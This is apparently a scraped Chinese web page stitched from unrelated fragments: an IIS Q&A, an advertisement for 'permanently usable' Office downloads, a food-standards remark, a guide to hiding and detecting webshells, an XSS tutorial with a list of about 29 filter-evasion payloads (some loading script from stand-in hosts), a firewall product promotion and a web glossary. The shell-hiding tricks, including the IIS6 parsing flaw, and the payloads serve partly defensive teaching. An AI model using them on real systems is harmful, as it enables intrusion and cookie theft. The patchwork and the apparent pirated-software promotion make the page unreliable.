你在安装IIS组件时,要完全安装才行,你现在重新装一下IIS嘛,如果还是没有XSSI,就只能到网上去下一个组件来用了.网上搜一下,应该有的!
以下全兼容的OFFICE,可彻底解决问题,按提示,安装完成即可彻底永久使用
Office2003经典版 软件及教程: http://biso.cn/soft/401.htm
Office2007完美版 软件及教程:http://biso.cn/soft/385.htm
OFFICE2013通用版软件及教程:http://biso.cn/soft/office_V.htm
里面包含完整的WORD \EXCEL \POWERPOINT \ACCESS \PDF
满足办公和计算机等级考试。
按提示,安装完成即可永久使用。支持任何WIN系统(包括 XP、WIN7、WIN8 32位和64位等)
WIN7 / WIN8 用户,选择软件,点鼠标右键,选择以管理员身份运行。
选择"插入“---”自动图文集“---”页眉/页脚“中选择”页码“这时就可输入你的页码了,此时的页码是可以手工输入的(你可以在
页面
上输入你所在页码),而不会是自动生成的。
GB7096-2003 食用菌卫生标准 是国家标准
Q/TJXSS 8是企业标准,
只要Q/TJXSS 8企业标准高于GB7096-2003 食用菌卫生标准 国家标准这是国家允许的,但从包装的质量看,保山印成了宝山,产品标准原是GB7096-2003又改Q/TJXSS 8,从这两点至少看出企业的管理是比较差的,所以产品的质量保证就不言而喻了。
1.进入站点,查看目录权限,可不可以写入和跨目录 2.查看admin,data,inc,upload等目录内部信息,或者站少人访问的直接站点根目录留. 3.免杀小马一般会在upload上传目录或者图片目录上传,有时候直接就在主页index里面包含跳转上传隐藏代码,大马一般不在根目录,站长得到的地方出现,会利用另名来迷惑站长,比如css.asp,或者inc2.asp,ad1.asp这些放在特定文件夹里,而遇上懒的站长,就会把这个shell帮忙永久保存了,呵呵..用wenshell扫描器一般可以将大部分的webshell扫出来,除非经过特殊免杀代码转换,或者利用iis6.0的解析漏洞,比如123.asp;123.jpg,win2000系统会默认为图片格式,但是默认的win2003iis6不会,直接解析成脚本执行,会导致webshell的出现,在动态单页面里包含一句话提交又或者利用include包含大法执行,也是查不到后门的方法,大伙可以去挖挖.好了,简单讲到这我们从光明的站长说吧,站点没出现什么访问问题,不代表没问题,oday,代码漏洞,注入,xss,nc上传等分分钟都可以使站点遭人种webshell 1.前面提到基本的方法就是shell扫描器,还有就是利用文件对比和旧的备份资料做对比,如果没有备份也没关系,直接把最新的文件列出来,用dreamwear查看代码,一般大牛用它来挖洞的噢..呵呵. 2.页面注入安全要防注,用户帐号权限要限制,目录脚本执行也要限制,一般上传图片的就禁止执行,其他目录禁止写入,删掉ws组建和cmd,除非是自己维护站点的,否则管理后台全部改名,且进行网段ip限制,自己的固定ip才可以登录后台. 3.网站如果用过编辑器,比如ewebeditor,fck这些的,把无相关的删掉,编辑器登录后台地址删掉,编辑器后台管理员帐户密码复杂化,去除带有可上传asa,asp,asasp,phpaspx,这些后缀,数据库设置为只读. 4.对可疑html清除包含漏洞,上面说过,可以包含上传代码运行呢.就像这样:index?id=nhs8.com,就可以进入上传画面. 5.还是那句话,经常备份,升级网页程序,扫描,查看记录.
不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击
网站要怎么防范常见的XSS跨站式脚本攻击呢,我们先从XSS跨站式脚本攻击的原理来说起。
网站遭受XSS跨站式脚本攻击的基本原理
1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
其攻击过程如下所示:
A给B发送一个恶意构造了Web的URL。
B点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。
具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。
A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。
2反射式漏洞,这种漏洞和本地利用漏洞有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
其攻击过程如下:
A经常浏览某个网站,此网站为B所拥有。B的站点运行A使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)。
C发现B的站点包含反射性的XSS漏洞。
C编写一个利用漏洞的URL,并将其冒充为来自B的邮件发送给A。
A在登录到B的站点后,浏览C提供的URL。
嵌入到URL中的恶意脚本在A的浏览器中执行,就像它直接来自B的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在A完全不知情的情况下将这些信息发送到C的Web站点。
3存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,骇客将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
其攻击过程如下:
B拥有一个Web站点,该站点允许用户发布信息/浏览已发布的信息。
C注意到B的站点具有存储式的XXS漏洞。
C发布一个热点信息,吸引其它用户纷纷阅读。
B或者是任何的其他人如A浏览该信息,其会话cookies或者其它信息将被C盗走。
类型A直接威胁用户个体,而类型B和存储式漏洞所威胁的对象都是企业级Web应用。
网站遭受XSS跨站式脚本攻击的基本方式
1. DOM-based cross-site scripting
页面本身包含一些DOM对象的操作,如果未对输入的参数进行处理,可能会导致执行恶意脚本。如下面一些DOM操作:
document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
举个例子,假如某个脆弱的页面的代码如下:
HTML
TITLEWelcome!/TITLE
Hi
SCRIPT
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
/SCRIPT
BR
Welcome to our system
…
/HTML
攻击者使用如下的URL访问时,则非常危险:
http://www.vulnerable.site/welcome.html?name=scriptalert(document.cookie)/script
试了一下,貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码,阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊,比如把上面的页面修改一下,安全性就增强了不少:
SCRIPT
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]$/))
{
document.write(name);
}
else
{
window.alert("Security error");
}
/SCRIPT
2. Reflected cross-site scripting
也被称为None-Persistent cross-site scripting,即,非持久化的XSS攻击,是我们通常所说的,也是最常用,使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL,当 URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接菜能引起。
3. Persistent cross-site scripting
持久化XSS攻击,指的是恶意脚本代码被存储进被攻击的数据库,当其他用户正常浏览网页时,站点从数据库中读取了非法用户存入非法数据,恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。
实施方式
我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:
1. input type="text" class="14c7-1931-76c4-f0ae Seach" name="w" value="XXX" /
OK,可以开始做文章了,我们将XXX替换为:abc"/scriptalert('haha')/scripta href=",返回的HTML代码如下:
1. input type="text" class="1931-76c4-f0ae-01b8 Seach" name="w" value="abc"/
2. scriptalert('haha')/script!--" /
这样,scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为:
1. IMG SRC="javascript:alert('XSS');"
2. IMG SRC=javascript:alert('XSS')
3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"
4. IMG SRC="jav ascript:alert('XSS');"
5. SCRIPT/XSS SRC="http://example.com/xss.js"/SCRIPT
6. SCRIPTalert("XSS");///SCRIPT
7. iframe src=http://example.com/scriptlet.html
8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"
9. BODY BACKGROUND="javascript:alert('XSS')"
10. BODY ONLOAD=alert(document.cookie)
11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")
12. IMG DYNSRC="javascript:alert('XSS')"
13. IMG DYNSRC="javascript:alert('XSS')"
14. BR SIZE="{alert('XSS')}"
15. IMG SRC='vbscript:msgbox("XSS")'
16. TABLE BACKGROUND="javascript:alert('XSS')"
17. DIV STYLE="width: expression(alert('XSS'));"
18. DIV STYLE="background-image: url(javascript:alert('XSS'))"
19. STYLE TYPE="text/javascript"alert('XSS');/STYLE
20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE
21. ?='SCRIPTalert("XSS")/SCRIPT'?
22. A HREF="javascript:document.location='http://www.example.com/'"XSS/A
23. IMG SRC=javascript:alert('XSS')
24. EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"/EMBED
25. a="get";
26. b="URL(""";
27. c="javascript:";
28. d="alert('XSS');"")";
29. eval(a+b+c+d);
总结一下,要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些javascript关键字和一些敏感的字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用encode编码。
用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。
准备工作:先去www.iisutm.com下载最新的IISUTM版本。
根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。
安装完成,通过浏览器访问IISUTM的配置管理界面默认的是http://127.0.0.1:8362,这个是私有地址,只能在该服务器上访问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。
登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防XSS攻击”链接。
开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库,你可以根据你网站的情况进行更改(最好不要修改)。
确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。
A — AJAX
AJAX 全称为“ Asynchronous JavaScript and XML ”(异步 JavaScript 和 XML ),是一种创建交互式网页应用的 网页开发 技术。根据Ajax提出者Jesse James Garrett建议,AJAX:
使用 XHTML + CSS 来表示信息;
使用 JavaScript 操作 DOM (Document Object Model)进行动态显示及交互;
使用 XML 和 XSLT 进行数据交换及相关操作;
使用 XMLHttpRequest 对象与 Web服务器 进行异步数据交换;
使用 JavaScript 将所有的东西绑定在一起。
类似于 DHTML 或 LAMP ,AJAX不是指一种单一的技术,而是有机地利用了一系列相关的技术。事实上,一些基于AJAX的“派生/合成”式(derivative/composite)的技术正在出现,如 AFLAX 。
B — Browser
网页浏览器 是个显示 网页服务器 或文件系统内的文件,并让用户与此些文件交互的一种 软件 。它用来显示在 万维网 或 局域网
等内的文字、图像及其他信息。这些文字或图像,可以是连接其他网址的超连结,用户可迅速及轻易地浏览各种信息。大部分网页为 HTML
格式,有些网页需特定浏览器才能正确显示。 个人电脑 上常见的网页浏览器按照2010年1月的市场占有率依次是 微软 的 Internet
Explorer 、 Mozilla 的 Firefox 、 Google 的 Google Chrome 、 苹果公司 的 Safari 和
Opera软件公司 的 Opera 。浏览器是最经常使用到的 客户端程序 。Web开发人员应该确保其程序在各个主流浏览器中都能正常工作。
C — CSS
层叠样式表, 又称: 串样式列表 ,英文: Cascading Style Sheets ,简写为 CSS ,由 W3C
定义和维护的标准,一种用来为结构化文档(如 HTML 文档或 XML 应用)添加样式(字体、间距和颜色等)的 计算机语言 。目前最新版本是
CSS 2.1,为W3C的候选推荐标准。下一版本CSS 3仍然在开发过程中。
D — DOM
文档对象模型 (Document Object Model,简称DOM),是 W3C 组织推荐的处理 可扩展置标语言
的标准编程接口。Document Object Model的历史可以追溯至1990年代后期微软与 Netscape 的“ 浏览器大战
”(browser wars),双方为了在 JavaScript 与 JScript
一决生死,于是大规模的赋予浏览器强大的功能。微软在网页技术上加入了不少专属事物,计有VBScript、ActiveX、以及微软自家的D HTML
格式等,使不少网页使用非微软平台及浏览器无法正常显示。DOM即是当时蕴酿出来的杰作。
E — Events
事件 是可以被控件识别的操作,如按下确定按钮,选择某个 单选按钮 或者 复选框 。每一种控件有自己可以识别的事件,如 窗体 的加载、单击、双击等事件,编辑框(文本框)的文本改变事,等等,现代的Web应用程序很大程度上依靠事件驱动。
事件有系统事件和用户事件。系统事件由系统激发,如时间每隔24小时,银行储户的存款日期增加一天。用户事件由用户激发,如用户点击按钮,在文本框中显示特定的文本。 事件驱动 控件执行某项功能。触发事件的对象称为事件发送者;接收事件的对象称为事件接收者。
使用事件机制可以实现:当类对象的某个状态发生变化时,系统将会通过某种途径调用类中的有关处理这个事件的方法或者触发控件事件的对象就会调用该控件所有已注册的事件处理程序等。
F — Firebug
Firebug 是 网页浏览器 Mozilla Firefox
的一个扩展,是一个除错工具。用户可以利用它除错、编辑、甚至删改任何网站的 CSS 、 HTML 、 DOM 、与 JavaScript
代码。Firebug 也有提供其他网页开发工具,例如 Yahoo! 的网页速度优化建议工具 YSlow 。Firebug是哈维( Joe
Hewitt )撰写的。他是最初Firefox创始者之一。
G — Grid
网格 ,也称 栅格 ,不过从定义上说,栅格更为准确些。网上找个一个对网页栅格系统比较恰当的 定义
:以规则的网格阵列来指导和规范网页中的版面布局以及信息分布。网页栅格系统是从平面栅格系统中发展而来。对于网页设计来说,栅格系统的使用,不仅可以让
网页的信息呈现更加美观易读,更具可用性。而且,对于前端开发来说,网页将更加的灵活与规范。如果有很多CSS框架支持栅格功能,可参考文章《
介绍27款经典的CSS框架 》。
H — HTML
超文本置标语言 ( 英文 : HyperText Markup Language , HTML )是为“ 网页 创建和其它可在 网页浏览器
中看到的信息”设计的一种 置标语言 。HTML被用来结构化信息——例如标题、段落和列表等等,也可用来在一定程度上描述文档的外观和 语义 。由
蒂姆·伯纳斯-李 给出原始定义,由 IETF 用简化的 SGML (标准通用置标语言)语法进行进一步发展的HTML,后来成为国际标准,由
万维网联盟 (W3C)维护。
最新版本是 HTML5 它是HTML下一个的主要修订版本,现在仍处于发展阶段。目标是取代1999年所定订的 HTML 4.01和
XHTML 1.0 标准,以期能在互联网应用迅速发展的时候,使网络标准达到符合当代的网络需求。广义论及HTML5时,实际指的是包括HTML、
CSS 和 JavaScript 在内的一套技术组合。
I — IE
Windows Internet Explorer (旧称 Microsoft Internet Explorer ,简称
Internet Explorer ,缩写 IE ),是 微软公司 推出的一款 网页浏览器
。截至2010年9月止,统计的数据显示Internet Explorer的 市场占有率
高达59.65%。虽然它依然是使用最广泛的网页浏览器,但与 2003年 最高峰时相比,市场占有率相差超过30%。
Internet Explorer对一些标准化技术都有一定程度上的支持,但亦有很多运行上的差距和兼容性的故障
,这导致技术开发者的批评日益增加。批评增加的情况,在很大程度上是归因于Internet
Explorer的竞争对手相对地已提供完全的技术支持,标准规格(Standards-compliant)的应用亦越来越广泛起来。因为
Internet Explorer在全球广为应用,网络开发者们在寻求 跨平台 的代码时常常会发现Internet
Explorer的漏洞、私有的功能集合和对标准支持的不完善。
2011年3月14日发布的Internet Explorer
9浏览器大幅提高对CSS3和HTML5等W3C规范的支持程度,这个版本也是Internet
Explorer浏览器第一个采用GPU加速的版本,正式版于Acid3测试中获得95/100分,相比以往版本有很大进步。可以认为,从
Internet Explorer 9开始,Internet Explorer浏览器对W3C规范的支持将不再是问题。
J — JavaScript
JavaScript 是一种广泛用于 客户端 Web开发 的 脚本语言
,常用来给HTML网页添加动态功能,比如响应用户的各种操作。它最初由 网景公司 的 Brendan Eich
设计,是一种动态、弱类型、基于原型的语言,内置支持类。JavaScript是 Sun公司 的注册商标。 Ecma国际
以JavaScript为基础制定了 ECMAScript
标准。JavaScript也可以用于其他场合,如服务器端编程。完整的JavaScript实现包含三个部分: ECMAScript ,
文档对象模型 , 字节顺序记号 。
Netscape公司在最初将其脚本语言命名为LiveScript来Netscape在与Sun合作之后将其改名为JavaScript。
JavaScript最初受 Java
启发而开始设计的,目的之一就是“看上去像Java”,因此语法上有类似之处,一些名称和命名规范也借自Java。但JavaScript的主要设计原则
源自 Self 和 Scheme
.JavaScript与Java名称上的近似,是当时网景为了营销考虑与Sun公司达成协议的结果。为了取得技术优势, 微软 推出了 JScript
来迎战JavaScript的 脚本语言 。为了互用性, Ecma国际 (前身为 欧洲计算机制造商协会
)创建了ECMA-262标准(ECMAScript)。现在两者都属于 ECMAScript 的实现。尽管JavaScript作为给非程序人员的
脚本语言 ,而非作为给程序人员的 编程语言 来推广和宣传,但是JavaScript具有非常丰富的特性。
K — Keyword Optimization
关键词优化 ,也叫 搜索引擎优化 ( Search Engine Optimization ,简称 SEO )是一种利用 搜索引擎
的搜索规则来提高目的 网站 在有关搜索引擎内的排名的方式。由于不少研究发现,搜索引擎的用户往往只会留意搜索结果最前面的几个条目,所以不少 网站
都希望通过各种形式来影响搜索引擎的排序。当中尤以各种依靠广告维生的网站为甚。
所谓“针对搜索引擎作优化的处理”,是指为了要让网站更容易被搜索引擎接受。搜索引擎会将网站彼此间的内容做一些相关性的数据比对,然后再由 浏览器 将这些内容以最快速且接近最完整的方式,体现给搜索者。
搜索引擎优化对于任何一家网站来说,要想在网站推广中取得成功,搜索引擎优化都是至为关键的一项任务。同时,随着搜索引擎不断变换它们的排名算法规
则,每次算法上的改变都会让一些排名很好的网站在一夜之间名落孙山,而失去排名的直接后果就是失去了网站固有的可观访问量。所以每次搜索引擎算法的改变都
会在网站之中引起不小的骚动和焦虑。可以说,搜索引擎优化是一个愈来愈复杂的任务。
L — Less
Less
最早是一个ruby的gem,让CSS具有动态语言的特性,这些特性包括变量,操作符,嵌套规则。其实Less真正的作用是将使用高级特性的CSS转换成
标准的CSS。这些都是在Web客户端发起请求时通过Http
Handler来完成的。也可以是编辑时就完成的。此外,Less可以配置成自动最小化所生成的CSS文件,不仅节省了带宽,并且使最终用户体验更上一
层。另外有.Net版本的 Less 。
M — MVC
MVC模式 (Model-View-Controller)是 软件工程 中的一种 软件架构
模式,把软件系统分为三个基本部分:模型(Model)、视图(View)和控制器(Controller)。MVC模式最早由 Trygve
Reenskaug 在1974年提出,是 施乐帕罗奥多研究中心 (Xerox PARC)在20世纪80年代为程序语言 Smalltalk
发明的一种软件设计模式。 MVC模式
的目的是实现一种动态的程序设计,使后续对程序的修改和扩展简化,并且使程序某一部分的重复利用成为可能。除此之外,此模式通过对复杂度的简化,使程序结
构更加直观。软件系统通过对自身基本部份分离的同时也赋予了各个基本部分应有的功能。
N — Node.JS
Node 是一个Javascript运行环境(runtime) , 实际上它是对Google V8 引擎(应用于Google
Chrome浏览器)进行了封装。 V8 引
擎执行Javascript的速度非常快,性能非常好。Node对一些特殊用例进行了优化,提供了替代的API,使得V8在非浏览器环境下运行得更好。例
如,在服务器环境中,处理二进制数据通常是必不可少的,但Javascript对此支持不足,因此,V8.Node增加了Buffer类,方便并且高效地
处理二进制数据。因此,Node不仅仅简单的使用了V8,还对其进行了优化,使其在各环境下更加给力。 Node.js
包罗万象,但最主要的一点是,它提供了一种在Web浏览器之外运行Javascript的途径。Javascript广泛应用于网站的前端开发。Node
使得这种流行的编程语言能够在更多环境下运行,甚至是网站的服务器端。
O — Object
对象 (object),是 面向对象 (Object Oriented) 中的术语,既表示客观世界 问题空间
(Namespace)中的某个具体的事物,又表示软件系统 解空间 中的基本元素。在软件系统中,对象具有唯一的 标识符 ,对象包括 属性
(Properties)和 方法 (Methods),属性就是需要记忆的信息,方法就是对象能够提供的服务。在面向对象(Object
Oriented) 的软件中,对象(Object)是某一个 类 (Class)的 实例 (Instance)。
P — PHP
PHP ( H ypertext P reprocessor )是一种在电脑上运行的 脚本语言 ,主要用途是在于处理 动态网页
,也包含了 命令行 运行接口(command line interface),或者产生 图形用户界面 (GUI)程序。PHP最早由 Rasmus
Lerdorf 在1995年发明,而现在PHP的标准由PHP Group和开放源代码社区维护。PHP以PHP
License作为许可协议,不过因为这个协议限制了PHP名称的使用,所以和开放源代码许可协议 GPL 不兼容。
PHP的应用范围相当广泛,尤其是在网页程序的开发上。一般来说PHP大多运行在网页服务器上,通过运行PHP代码来产生用户浏览的网页。PHP可
以在多数的服务器和操作系统上运行,而且使用PHP完全是免费的。根据2007年4月的统计数据,PHP已经被安装在超过2000万个网站和100万台服
务器上。
Q — Query
查询 ,有很多种意思。例如查询语言用来和存储数据的扩展系统交互,一个很好的例子就是SQL用来操作关系数据库。另一种意思是,一个查询字符串,作为URL的一部分用于Web应用程序中传递数据,查询字符串的格式一般是键值对形式。
R — Regular Expressions
正则表达式 ( 英语 :Regular Expression、regex或regexp,缩写为RE),也译为 正规表示法 、 常规表示法
,在 计算机科学 中,是指一个用来描述或者匹配一系列符合某个 句法 规则的 字符串 的单个字符串。在很多 文本编辑器
或其他工具里,正则表达式通常被用来检索和/或替换那些符合某个模式的文本内容。许多 程序设计语言 都支持利用正则表达式进行字符串操作。例如,在
Perl 中就内建了一个功能强大的正则表达式引擎。正则表达式这个概念最初是由 Unix 中的工具软件(例如 sed 和 grep )普及开的。
S — Source Control
源代码管理 ,也称 版本控制 ,是一种 软件工程 技巧,借此能在软件开发的过程中,确保由不同人所编辑的同一程式档案都得到同步。 软件设计师
常会利用版本控制来追踪、维护 源码 、 文件 以及 设定档 等等的更动,并且提供控制这些更动控制权的 程序 。在最简单的情况下, 软件设计师
可以自己保留一个程式的许多不同版本,并且为它们做适当的编号。这种简单的方法已被用在很多大型的软件专案中。这是一个可以达到目的的方法,但不够有效
率。除了得同时维护很多几乎一样的 程式码 备份外;而且极度依赖 软件设计师 的自我修养与开发纪律,但这却常是导致错误发生的原因。
有时候,一个程式同时存有两个以上的版本也有其必要性,例如:在一个为了部署的版本中 程式错误
已经被修正、但没有加入新功能;在另一个开发版本则有新的功能正在开发、也有新的错误待解决,这使得同时间需要不同的版本并修改。此外,为了找出只存在于
某一特定版本中的 程式错误 、或找出 程式错误 出现的版本,软件除错者也必须借由比对不同版本的程式码以找出问题的位置。
T — TDD
测试驱动开发 (Test-driven development)是现代计算机 软件开发 方法的一种。利用 测试 来驱动 软件
程序的设计和实现。测试驱动开始流行于20世纪90年代。测试驱动开发是 极限编程
中倡导的程序开发方法,方法主要是先写测试程序,然后再编码使其通过测试。测试驱动开发的目的是取得快速反馈并使用“illustrate the
main line”方法来构建程序。
测试驱动开发的比喻。开发可以从两个方面去看待:实现的功能和质量。测试驱动开发更像两顶帽子思考法的开发方式,先戴上实现功能的帽子,在测试的辅
助下,快速实现正确的功能;再戴上 重构
的帽子,在测试的保护下,通过去除冗余和重复的代码,提高代码重用性,实现对质量的改进。可见测试在测试驱动开发中确实属于核心地位,贯穿了开发的始终。
U — Unit Testing
单元测试 (又称为 模块测试 )是针对 程序模块 ( 软件设计 的最小单位)来进行正确性检验的测试工作。程序单元是应用的最小可测试部件。在
过程化编程 中,一个单元就是单个程序、函数、过程等;对于面向对象编程,最小单元就是方法,包括基类(超类)、抽象类、或者派生类(子类)中的方法。
通常来说,程序员每修改一次程序就会进行最少一次单元测试,在编写程序的过程中前后很可能要进行多次单元测试,以证实程序达到 软件规格书 (
en:Specification )要求的工作目标,没有 臭虫 ;虽然单元测试不是什么必须的,但也不坏,这牵涉到 项目管理 的政策决定。
V — VIM
Vim 是从 vi 发展出来的一个 文本编辑器 。代码补完、编译及错误跳转等方便编程的功能特别丰富,在程序员中被广泛使用。和 Emacs
并列成为 类Unix系统 用户最喜欢的编辑器。Vim的第一个版本由 Bram Moolenaar 在1991年发布。最初的简称是 V i
IM itation,随着功能的不断增加,正式名称改成了 V i IM proved。现在是在 开放源代码 方式下发行的 自由软件 。
W — WordPress
WordPress 是一种使用 PHP 语言开发的 博客 平台,用户可以在支持 PHP 和 MySQL 数据库
的服务器上架设自己的网志。也可以把 WordPress 当作一个 内容管理系统 (CMS)来使用。WordPress 是一个免费的 开源
项目,在 GNU通用公共许可证
下授权发布。目前最新版本为2011年2月24日发布的3.0.5官方简体中文版,另外还有包括英文在内的多种语言可选。
X — XSS
跨网站指令码 ( Cross-site scripting ,通常简称为 XSS )是一种网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了 HTML 以及使用者端 脚本语言 。
Y — YUI
Yahoo! UI Library ( YUI ) 是一个开放源代码的 JavaScript 函数库,为了能建立一个高互动的网页,它采用了 AJAX , DHTML 和 DOM 等程式码技术。它也包含了许多 CSS 资源。
Z — Z index
Z-Index
是CSS属性,设置元素的堆叠顺序。拥有更高堆叠顺序的元素总是会处于堆叠顺序较低的元素的前面。该属性设置一个定位元素沿 z 轴的位置,z 轴定义为垂直延伸到显示区的轴。如果为正数,则离用户更近,为负数则表示离用户更远。
我来说两句